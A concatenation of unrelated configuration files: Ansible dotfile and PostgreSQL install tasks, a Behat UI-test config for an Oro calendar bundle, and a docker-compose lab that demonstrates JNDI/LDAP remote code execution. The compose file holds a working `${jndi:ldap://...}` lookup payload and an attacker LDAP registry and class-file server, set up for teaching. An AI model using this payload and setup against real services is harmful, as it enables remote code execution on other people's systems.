    - { src: files/gitconfig.j2, dst: ~/.gitconfig }
    - { src: files/gitmessage, dst: ~/.gitmessage }
    - { src: files/pet-snippets.toml.j2, dst: ~/.config/pet/snippet.toml }
    - { src: files/pet.zsh, dst: ~/.pet.zsh }
    - { src: files/psqlrc, dst: ~/.psqlrc }
    - { src: files/tmux.conf, dst: ~/.tmux.conf }
    - { src: files/vimrc, dst: ~/.vimrc }
    - { src: files/wgetrc, dst: ~/.wgetrc }
    - { src: files/zprofile, dst: ~/.zprofile }
    - { src: files/zshenv, dst: ~/.zshenv }
    - { src: files/zshrc, dst: ~/.zshrc }
|
roles/workstation/tasks/user/user.yml
|
# Behat configuration for OroCalendarBundle UI tests: suite contexts and
# feature paths, plus the page objects and named elements scenarios use.
# NOTE(review): `pages:` and `elements:` were indented under `suites:`,
# making them look like suite names; they are extension-level sections
# (siblings of `suites:`) and are re-indented accordingly — confirm
# against the Oro Behat extension schema. All selector strings unchanged.
oro_behat_extension:
  suites:
    OroCalendarBundle:
      contexts:
        - Oro\Bundle\CalendarBundle\Tests\Behat\Context\FeatureContext
        - Oro\Bundle\ConfigBundle\Tests\Behat\Context\FeatureContext
        - Oro\Bundle\DataGridBundle\Tests\Behat\Context\GridContext
        - Oro\Bundle\EmailBundle\Tests\Behat\Context\EmailContext
        - Oro\Bundle\FormBundle\Tests\Behat\Context\FormContext
        - Oro\Bundle\TestFrameworkBundle\Tests\Behat\Context\OroMainContext
        - OroSearchBundle::SearchContext
      paths:
        - '@OroCalendarBundle/Tests/Behat/Features'

  pages:
    Default Calendar View:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Page\DefaultCalendarView
      route: oro_calendar_view_default

  elements:
    Calendar:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\Calendar
      selector: "div[id^='calendar']"
    Calendar Event:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\CalendarEvent
      selector: '.fc-event'
    Calendar Event Info:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\CalendarEventInfo
      selector: '.ui-dialog'
    First All Day Cell:
      selector:
        type: xpath
        locator: '(//*[contains(@class, "fc-week")]/descendant::*[contains(@class, "fc-content-skeleton")]/descendant::td)[2]'
    Multiday Event:
      selector:
        type: xpath
        locator: '//td[contains(@class, "fc-event-container")][@colspan]/*[contains(@class, "fc-event")]'
    Event Form:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventForm
      selector: 'form[name="oro_calendar_event_form"]'
      options:
        mapping:
          Start: 'oro_calendar_event_form[start]'
          End: 'oro_calendar_event_form[end]'
    Start Datetime:
      selector: '[name="oro_calendar_event_form[start]"]'
    End Datetime:
      selector: '[name="oro_calendar_event_form[end]"]'
    All Day Event:
      selector: '[name="oro_calendar_event_form[allDay]"]'
    EndsRecurrence:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\End
      selector: 'div[data-name="recurrence-ends"]'
    DailyRecurrence:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Daily
      selector: 'div[data-name="recurrence-daily"]'
    WeeklyRecurrence:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Weekly
      selector: 'div[data-name="recurrence-weekly"]'
    MonthlyRecurrence:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Monthly
      selector: 'div[data-name="recurrence-monthly"]'
    YearlyRecurrence:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Yearly
      selector: 'div[data-name="recurrence-yearly"]'
    Empty slot:
      selector:
        type: xpath
        locator: '//tr[@data-time="10:30:00"]'
    Select Expected Close Date:
      selector:
        type: xpath
        locator: '//input[@placeholder="Choose a date"]'
    Today:
      selector:
        type: xpath
        locator: '//button[@class="ui-datepicker-current ui-state-default ui-priority-secondary ui-corner-all"]'
    My Calendar Choose Color Menu:
      class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\MyCalendarChooseColorMenu
      selector: 'li[data-calendar-alias="user"] button.context-menu-button'
    Calendar Activity Item:
      selector:
        type: xpath
        locator: '//div[@class="accordion-heading"]'
    System Calendars Grid:
      class: Oro\Bundle\DataGridBundle\Tests\Behat\Element\Grid
      selector: 'div[data-page-component-name="system-calendar-grid"]'
    Event in calendar March 31:
      selector: '.fc-event-container span.fc-title:contains("All-Day event with repeats 31")'
|
Tests/Behat/behat.yml
|
# Compose stack for a JNDI/LDAP remote-code-execution demo: a vulnerable
# "victim" JVM service plus the attacker's LDAP registry and codebase.
version: "3"
services:
  # The service on which to gain RCE
  victim:
    build:
      context: ${PWD}/src/victim/
      dockerfile: ${PWD}/docker/gradle-app.Dockerfile
      args:
        APP_NAME: "victim"
    environment:
      # `$$` is Compose's escape for a literal `$`, so the JVM receives
      # the raw `${jndi:ldap://...}` lookup string unexpanded.
      JAVA_OPTS: >-
        -Dvictim-payload=$${jndi:ldap://attacker_ldap_registry:1389/cn=made-class,dc=ldap-registry,dc=attacker}
    # NOTE(review): depends_on only orders container start-up; it does
    # not wait for the registry to be ready to serve requests.
    depends_on:
      - attacker_ldap_registry
      - attacker_ldap_registry_setup
      - attacker_codebase
  # The attacker hosts a server which the victim can use to look up the location
  # of the code to execute. Specifically, the directory server will contain a
  # `Reference` containing a factory class to use to construct an object. This
  # factory class is executed on the victim, giving RCE.
  #
  # Many frameworks can be used for this, including RMI and CORBA. We just use
  # an LDAP server.
  attacker_ldap_registry:
    image: "bitnami/openldap:2.5"
    environment:
      LDAP_PORT_NUMBER: "1389"
      LDAP_ROOT: "dc=ldap-registry,dc=attacker"
      LDAP_ADMIN_USERNAME: "admin"
      # Placeholder credentials; anonymous binds are allowed below, so
      # the demo does not rely on these values.
      LDAP_ADMIN_PASSWORD: "<PASSWORD>"
      LDAP_USERS: "nobody"
      LDAP_PASSWORDS: "<PASSWORD>"
      LDAP_GROUP: "users"
      LDAP_EXTRA_SCHEMAS: "cosine,inetorgperson,nis,java,corba"
      LDAP_ALLOW_ANON_BINDING: "yes"
    ports:
      - "1389:1389"
  # The LDAP registry must be initialized with data. The `Reference` must be
  # placed into the directory. This could easily be done with an LDIF file on
  # bootstrap, but we write a Kotlin program to do that for us.
  attacker_ldap_registry_setup:
    build:
      context: ${PWD}/src/attacker_ldap_registry_setup/
      dockerfile: ${PWD}/docker/gradle-app.Dockerfile
      args:
        APP_NAME: "attacker_ldap_registry_setup"
    environment:
      JAVA_OPTS: >-
        -Dattacker-ldap-registry-url=ldap://attacker_ldap_registry:1389/dc=ldap-registry,dc=attacker
        -Dattacker-codebase-url=http://attacker_codebase:80/
    depends_on:
      - attacker_ldap_registry
  # The victim needs to know the classes of the objects the attacker feeds it.
  # In Java parlance, the victim needs to know the "codebase" of the attacker.
  # We set that up here. This HTTP server will host the `.class` files needed by
  # the victim for remote code execution.
  attacker_codebase:
    build:
      context: ${PWD}/src/attacker_codebase
      dockerfile: ${PWD}/docker/gradle-java-codebase.Dockerfile
    ports:
      # Host 8080 -> container 80 (the codebase HTTP server).
      - "8080:80"
|
docker-compose.yml
|
# The standard ca-certs are needed because without them the package
# manager will fail to validate www.postgresql.org (or probably any
# other https source).
- name: PostgreSQL | Make sure the CA certificates are available
  yum:
    name: ca-certificates
    state: present

# The repository RPM is staged on the control machine first, so create
# a per-host scratch directory locally.
- name: PostgreSQL | Create temp directory
  become: false
  connection: local
  file:
    path: ".tmp/{{ inventory_hostname }}"
    state: directory
# Download happens on the control machine (useful when the target has
# restricted outbound access); the RPM is then pushed to the server.
- name: PostgreSQL | Download repository RPM
  connection: local
  become: false
  get_url:
    dest: ".tmp/{{ inventory_hostname }}/postgres_{{ postgresql_version_terse }}_repository.rpm"
    url: "{{ postgresql_yum_repository_url }}"
  # Staging the file locally is an implementation detail, not a change
  # on the managed host, so never report it as changed.
  changed_when: false

- name: PostgreSQL | Copy repository RPM to server
  copy:
    src: ".tmp/{{ inventory_hostname }}/postgres_{{ postgresql_version_terse }}_repository.rpm"
    dest: "/tmp/postgres_{{ postgresql_version_terse }}_repository.rpm"
- name: PostgreSQL | Add PostgreSQL repository
  yum:
    name: "/tmp/postgres_{{ postgresql_version_terse }}_repository.rpm"
    state: present

# When a proxy is configured the repo URLs are downgraded to plain http
# (presumably so the proxy can handle/cache the traffic — confirm).
# The pattern is anchored to the URL scheme; a bare "https" regexp
# would rewrite the substring anywhere it appears in the repo file.
- name: PostgreSQL | Switch to http
  replace:
    dest: "/etc/yum.repos.d/pgdg-{{ postgresql_version_terse }}-redhat.repo"
    regexp: "https://"
    replace: "http://"
  when: "http_proxy is not none"
# Point both pgdg repo sections at the proxy. `insertafter` anchors on
# the literal section header (e.g. "[pgdg96]"); regex_escape() stops
# the brackets from being read as a regex character class. The header
# is appended to the inserted line as a trailing comment so repeated
# runs and humans can tell the two proxy lines apart.
- name: PostgreSQL | Add proxy to repo
  lineinfile:
    dest: "/etc/yum.repos.d/pgdg-{{ postgresql_version_terse }}-redhat.repo"
    insertafter: "^{{ item | regex_escape() }}"
    line: "proxy={{ http_proxy }} #{{ item }}"
  with_items:
    - "[pgdg{{ postgresql_version_terse }}]"
    - "[pgdg{{ postgresql_version_terse }}-source]"
  when: "http_proxy is not none"
# Passing the whole list to `name` installs everything in one yum
# transaction; looping the yum module once per package is slower and
# deprecated in modern Ansible.
- name: PostgreSQL | Make sure the dependencies are installed
  yum:
    name: ["python-psycopg2", "python-pycurl", "glibc-common"]
    state: present
    update_cache: true
# Server, client and contrib packages in a single yum transaction
# (the yum module accepts a list for `name`; no per-item loop needed).
- name: PostgreSQL | Install PostgreSQL
  yum:
    name:
      - "postgresql{{ postgresql_version_terse }}-server"
      - "postgresql{{ postgresql_version_terse }}"
      - "postgresql{{ postgresql_version_terse }}-contrib"
    state: present
  environment: "{{ postgresql_env }}"
# Optional tuning helper; only installed when the role is configured
# with postgresql_pgtune enabled.
- name: PostgreSQL | PGTune
  yum:
    name: pgtune
    state: present
  environment: "{{ postgresql_env }}"
  when: postgresql_pgtune
|
tasks/install_yum.yml
|